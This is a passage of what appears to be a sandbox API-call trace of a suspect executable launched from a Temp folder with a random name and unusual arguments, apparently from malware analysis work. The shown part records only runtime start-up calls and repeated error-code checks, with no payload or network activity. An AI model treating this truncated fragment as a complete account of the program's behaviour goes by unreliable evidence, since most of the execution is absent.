lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13b07d0)) [0112.056] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0112.056] GetFileType (hFile=0x3) returned 0x0 [0112.056] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0112.056] GetFileType (hFile=0x7) returned 0x0 [0112.056] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0112.056] GetFileType (hFile=0xb) returned 0x0 [0112.056] SetHandleCount (uNumber=0x20) returned 0x20 [0112.056] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.056] GetEnvironmentStringsW () returned 0x20fc88* [0112.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0112.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x13b11f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0112.057] FreeEnvironmentStringsW (penv=0x20fc88) returned 1 [0112.057] GetLastError () returned 0x6 [0112.057] SetLastError (dwErrCode=0x6) [0112.057] GetLastError () returned 0x6 [0112.057] SetLastError (dwErrCode=0x6) [0112.057] GetLastError () returned 0x6 [0112.057] SetLastError (dwErrCode=0x6) [0112.057] GetACP () returned 0x4e4 
[0112.057] GetLastError () returned 0x6 [0112.057] SetLastError (dwErrCode=0x6) [0112.057] IsValidCodePage (CodePage=0x4e4) returned 1 [0112.057] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0112.057] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0112.057] GetLastError () returned 0x6 [0112.057] SetLastError (dwErrCode=0x6) [0112.057] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.057] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0112.057] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0112.058] GetLastError () returned 0x6 [0112.058] SetLastError (dwErrCode=0x6) [0112.058] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.058] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, 
cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䶳氀ശAĀ") returned 256 [0112.058] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䶳氀ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0112.058] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䶳氀ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0112.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\
x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x67\x6e\x7e\x6e\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0112.058] GetLastError () returned 0x6 [0112.058] SetLastError (dwErrCode=0x6) [0112.058] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.058] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䶳氀ശAĀ") returned 256 [0112.058] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䶳氀ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0112.058] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, 
lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䶳氀ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0112.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x67\x6e\x7e\x6e\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0112.058] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.058] GetLastError () returned 0x0 [0112.058] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 
[0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.059] GetLastError () returned 0x0 [0112.059] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 
[0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.060] SetLastError (dwErrCode=0x0) [0112.060] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.061] SetLastError (dwErrCode=0x0) [0112.061] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] GetLastError () returned 0x0 [0112.062] SetLastError (dwErrCode=0x0) [0112.062] 